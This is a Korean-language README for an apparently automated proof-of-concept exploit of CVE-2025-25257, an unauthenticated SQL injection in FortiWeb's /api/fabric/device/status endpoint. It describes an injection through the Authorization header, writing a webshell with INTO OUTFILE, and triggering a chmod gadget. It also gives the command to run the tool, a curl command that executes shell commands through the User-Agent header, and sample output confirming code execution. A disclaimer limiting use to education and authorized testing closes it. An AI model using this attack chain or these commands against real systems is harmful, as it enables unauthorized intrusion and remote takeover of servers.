
CVE-2025-25257에 대한 PoC로, FortiWeb의 중요하고 인증이 필요 없는 SQL 인젝션 취약점입니다. Authorization 헤더를 통해 SQLi를 악용하여 웹쉘을 작성하고 RCE를 획득합니다. 로그인이 필요하지 않습니다. 완전 자동화되었습니다.
심각한 SQL 인젝션 → 웹쉘 실행
발견 및 공격 도구화: 0xgh057r3c0n
CVE-2025-25257는 /api/fabric/device/status 엔드포인트를 노출하는 FortiWeb 시스템에 영향을 미치며, 이는 Authorization 헤더 입력을 적절히 검증하지 않습니다.
공격자는 인증 없이 SQL 인젝션을 수행하여 서버에 웹쉘을 작성하고 원격으로 명령을 실행할 수 있습니다.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE을 통한 쉘 드롭python3 CVE-2025-25257.py -t https://target-host.com
그런 다음:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requests 모듈설치:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| 메트릭 | 값 |
|---|---|
| 기본 점수 | 9.8 (심각) |
| 공격 벡터 | 네트워크 |
| 필요 권한 | 없음 |
| 사용자 상호작용 | 없음 |
| 영향 | 높음 (C/I/A) |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
이 개념 증명은 교육 및 승인된 테스트 목적으로만 제공됩니다. 사용에 따른 모든 책임은 본인에게 있습니다. 저자는 오용에 대해 책임을 지지 않습니다.